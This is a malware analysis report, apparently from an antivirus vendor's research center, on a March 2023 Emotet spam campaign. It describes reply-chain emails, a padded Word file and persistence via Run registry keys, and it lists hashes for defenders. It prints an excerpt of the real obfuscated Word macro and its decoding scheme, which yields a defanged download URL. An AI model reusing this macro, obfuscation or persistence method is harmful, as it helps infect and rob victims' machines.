Emotet has started sending MalSpam again!

EMOTET has resumed malspam operations after a period of inactivity. Italy is also a target of malicious activities.

In the late afternoon of March 7, 2023, #TG Soft's #CRAM found the resumption of MalSpam dissemination activities to convey the Emotet malware through its Botnet named Epoch4.
The Emotet malware, once infected the victim's PC performs password/data exfiltration activities and also uses the infected PC to send additional Malspam email messages to spread the malware itself. It can also download additional malware as well as Ransomware/CryptoMalware variants.

Below we see an example of an email used to spread the EMOTET malware:

This email uses the "reply-chain" technique, that is, the message contains parts of real emails stolen by the Emotet malware and used to create more credible messages. In fact, the victim is more easily fooled by the familiarity of the content.

Inside the email we find a .zip file that contains an Office document (.doc).
Once extracted, the file turns out to be large. In fact, it is around 500 MB. The size is due to the presence of "null bytes" hanging at the end of the file. This technique has been used before by cyber criminals to make it more difficult for AntiMalware programs to intercept them. Once the "null bytes" are removed, the file size is greatly reduced to less than 1 MB.

Opening the file will show a fake error message, which with an excuse invites the user to enable the macro. Emotet exploits several decoy images during various daily MalSpam campaigns. Below we see the decoy image named "Red Dawn" used in the analyzed campaign:


If the activation request is confirmed, the MACRO is executed.

The MACRO is obfuscated to reduce its chances of interception. This contains the code to be executed to perform the download and execution of the Payload leading
to infection of the PC.
Click to see an excerpt of the obfuscated code:
Sub AutoOpen() Dim aJRSJ As String Dim VzuVIc As String Dim d As String Dim jSmwz(56) As Long Dim QbnLCeBS As Long Dim ytC As Integer ytC = 36 QbnLCeBS = ytC
d=":utjaxnBx/HVSaMkuuhX.mSOfCHZCdldrawquwjnpdULCMkisdskQsnGwecceXrmQkxW/cSsslXKbtmhkmhXnWpSaoKg/tIgytVoXOjSwhmskNnSMXFX5vcBjdFO6cWjm/BMept-MQntsrakifOaYJRxDUws/envGpAVgnwLXdIltxbHwvpzuZisi" Dim U As Integer U = 19 jSmwz(0) = U Dim iKZLDRc As Integer iKZLDRc = 3 jSmwz(1) = iKZLDRc Dim fSVtgxU As Integer fSVtgxU = 3 jSmwz(2) = fSVtgxU Dim kCPNtWkV As Integer kCPNtWkV = 41 jSmwz(3) = kCPNtWkV Dim WCt As Integer WCt = 1 jSmwz(4) = WCt Dim hftErpc As Integer hftErpc = 10 jSmwz(5) = hftErpc Dim KzUGuQA As Integer KzUGuQA = 10 jSmwz(6) = KzUGuQA Dim hDU As Integer hDU = 16 jSmwz(7) = hDU Dim MYa As Integer MYa = 92 jSmwz(8) = MYa Dim KOblJY As Integer KOblJY = 49 jSmwz(9) = KOblJY Dim ESvDQRl As Integer ESvDQRl = 7 jSmwz(10) = ESvDQRl Dim ZKmEZy As Integer ZKmEZy = 21 jSmwz(11) = ZKmEZy Dim fPdDcmHb As Integer fPdDcmHb = 49 jSmwz(12) = fPdDcmHb Dim Cb As Integer Cb = 2 jSmwz(13) = Cb Dim pIJIlD As Integer pIJIlD = 10 jSmwz(14) = pIJIlD Dim uvkhJ As Integer uvkhJ = 35 jSmwz(15) = uvkhJ Dim nwh As Integer nwh = 41 jSmwz(16) = nwh Dim GDHFh As Integer GDHFh = 136 jSmwz(17) = GDHFh Dim JIKxeXaV As Integer JIKxeXaV = 48 jSmwz(18) = JIKxeXaV Dim ivuWHT As Integer ivuWHT = 7 jSmwz(19) = ivuWHT Dim CgGeiF As Integer CgGeiF = 59 jSmwz(20) = CgGeiF Dim Yd As Integer Yd = 31 jSmwz(21) = Yd Dim hzroOc As Integer hzroOc = 2 jSmwz(22) = hzroOc Dim oXd As Integer oXd = 30 jSmwz(23) = oXd Dim uN As Integer uN = 58 jSmwz(24) = uN Dim AUnenK As Integer AUnenK = 49 jSmwz(25) = AUnenK Dim lCKYrb As Integer lCKYrb = 10 jSmwz(26) = lCKYrb Dim TPkq As Integer TPkq = 48 jSmwz(27) = TPkq Dim dnhRBxrB As Integer dnhRBxrB = 125 jSmwz(28) = dnhRBxrB Dim nCft As Integer nCft = 117 jSmwz(29) = nCft Dim iTXGex As Integer iTXGex = 12 jSmwz(30) = iTXGex Dim hjuNrHW As Integer hjuNrHW = 95 jSmwz(31) = hjuNrHW Dim gySs As Integer gySs = 15 jSmwz(32) = gySs Dim MqgIasZX As Integer MqgIasZX = 151 jSmwz(33) = MqgIasZX Dim pllPm As Integer pllPm = 25 jSmwz(34) = pllPm Dim TMgtM As Integer TMgtM = 10 jSmwz(35) = TMgtM Dim ZBjJzGy As Integer ZBjJzGy = 89 jSmwz(36) = ZBjJzGy Dim Ji As Integer Ji = 122 jSmwz(37) = Ji Dim QzaPk As Integer QzaPk = 116 jSmwz(38) = QzaPk Dim LiEcLSeO As Integer LiEcLSeO = 169 jSmwz(39) = LiEcLSeO Dim WlV As Integer WlV = 73 jSmwz(40) = WlV Dim UiuEh As Integer UiuEh = 22 jSmwz(41) = UiuEh Dim uDtdlGP As Integer uDtdlGP = 53 jSmwz(42) = uDtdlGP Dim lmIXFKPJ As Integer lmIXFKPJ = 102 jSmwz(43) = lmIXFKPJ Dim LChq As Integer LChq = 65 jSmwz(44) = LChq Dim pphlFJ As Integer pphlFJ = 20 jSmwz(45) = pphlFJ Dim EWTfAC As Integer EWTfAC = 155 jSmwz(46) = EWTfAC Dim HuG As Integer HuG = 36 jSmwz(47) = HuG Dim WfkpOngw As Integer WfkpOngw = 84 jSmwz(48) = WfkpOngw Dim JQMdJqPV As Integer JQMdJqPV = 163 jSmwz(49) = JQMdJqPV Dim VatAhZ As Integer VatAhZ = 63 jSmwz(50) = VatAhZ Dim ewmYo As Integer ewmYo = 111 jSmwz(51) = ewmYo Dim YdVfEuz As Integer YdVfEuz = 133 jSmwz(52) = YdVfEuz Dim iUYWb As Integer iUYWb = 182 jSmwz(53) = iUYWb Dim yVT As Integer yVT = 59 jSmwz(54) = yVT Dim TsIZlHDN As Integer TsIZlHDN = 182 jSmwz(55) = TsIZlHDN VzuVIc = SSzyRyUh(d, jSmwz, QbnLCeBS)

The commands are obfuscated and are extracted via the SSzyRyUh() function.

This function accepts 3 parameters:
  1. the seemingly random string
  2. an array of positions
  3. the length of the final string
For example, the "random" string:

shown above, is deoffuscated by an array with the following positions:
"19, 3, 3, 41, 1, 10, 10, 16, 92, 49, 7, 21, 49, 2, 10, 35, 41, 136, 48, 7, 59, 31, 2, 30, 58, 49, 10, 48, 125, 117, 12, 95, 15, 151, 25, 10, 89, 122, 116, 169, 73, 22, 53, 102, 65, 20, 155, 36, 84, 163, 63, 111, 133, 182, 59, 182"

Of these positions, only the first 36 will be used, which allow for the deoffuscated string "http://kgsn[.]su/wp-includes/i65VIMRf/".

Having downloaded a compressed file, the macro proceeds to decompress it and eventually execute it to initiate the infection of the PC.
The Emotet payload is a DLL that is started via the Windows regsvr32.exe process.
Two cases can be distinguished at this point: the first when the DLL is executed with administrator permissions, and the second when the DLL is executed with limited standard user permissions.
  • Administrator user: the DLL is copied to the path "C:\Windows\system32" where it creates a folder with a random name. Persistence is achieved through the RUN registry key at the path "HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run".
  • Standard user: the DLL is copied inside "%localappdata%" where it creates a folder with a random name. Persistence is achieved via the RUN registry key at the path "HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run"
Then the malware remains active in the infected PC by carrying out communication with the command and control servers (C2). From the command and control server it will receive commands for tasks to be performed in the infected machine such as:
  • Update of Emotet itself
  • Data and/or information exfiltration
  • Downloading and executing additional payloads
  • Initiation of malspam activities
Let's look at the details of the analyzed DLL:
Nome File 5Md2yh6uPNPJJqeiASdvY.dll
Dimensione 564666075 bytes
SHA-256 6A13EC3F13380E8434DEBC4A65B64DFC3005443B96335256221623E7D50E1911
Data compilazione 2023-03-08 17:24:36
Botnet Epoch4

From the analysis of the payload and its activities, 3 types of command and control servers were identified.
The first type consists of 49 IP addresses:

This first group of C2s is located in Brazil, the United States, South Korea, Thailand, France, Singapore, the United Kingdom, Australia, South Africa, Japan, Indonesia, Germany, Kyrgyzstan, India, Spain, Japan, Greece, Finland, Colombia, North Macedonia, and Canada:

The second type consists of 10 IP addresses:

The second group of C2 is located in Singapore, France, the United States, Colombia, Russia, India, and Indonesia:

The third type consists of 15 IP addresses:

The third group of C2 is located in the United States, Singapore, Germany, France, Canada, South Korea, Vietnam, India, and Thailand:

Command and Control servers are divided into types based on the activities performed, the first group being the initial server group that is used in the main communication phase. The other groups are retrieved later and are associated with subsequent activities of the Emotet malware.

fatturamarzo.doc -> 97E1599DD34D800B694A7C9F202A03C45CFA05D6D3B6C86F125E7F42DB5237F1
5Md2yh6uPNPJJqeiASdvY.dll - > 6A13EC3F13380E8434DEBC4A65B64DFC3005443B96335256221623E7D50E1911


Find out if you are an Emotet target!
TG Soft, as reported in the "HAVEiBeenEMOTET portal to know if an email box has been used in malspam campaigns to spread EMOTET" information, has made available and has maintained for more than a year the HAVEiBeenEMOTET service, which is useful to check if one's email addresses or domains are targeted by Emotet.
With this service you can check for free if your email addresses/domains are involved in or are targets of MalSpam by Emotet.
Advanced search capabilities and the IOC feed are available by registering and activating the API service at the link: HAVEiBeenEMOTET - API

Below we see the location of the domain used as Real Sender for sending malicious messages monitored by HAVEiBeenEMOTET service on 08/03/2023:
As can we can see, Italy ranked fourth (taking out generic extensions) with 6% of addresses categorized as Real Sender, i.e., addresses used for actually sending the malicious messages. Taking out generic extensions, the most used geographic extension with as many as 11% was Japanese.

Information drafted by:
Michele Zuin
Radu Breabin
Massimo Canova
Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: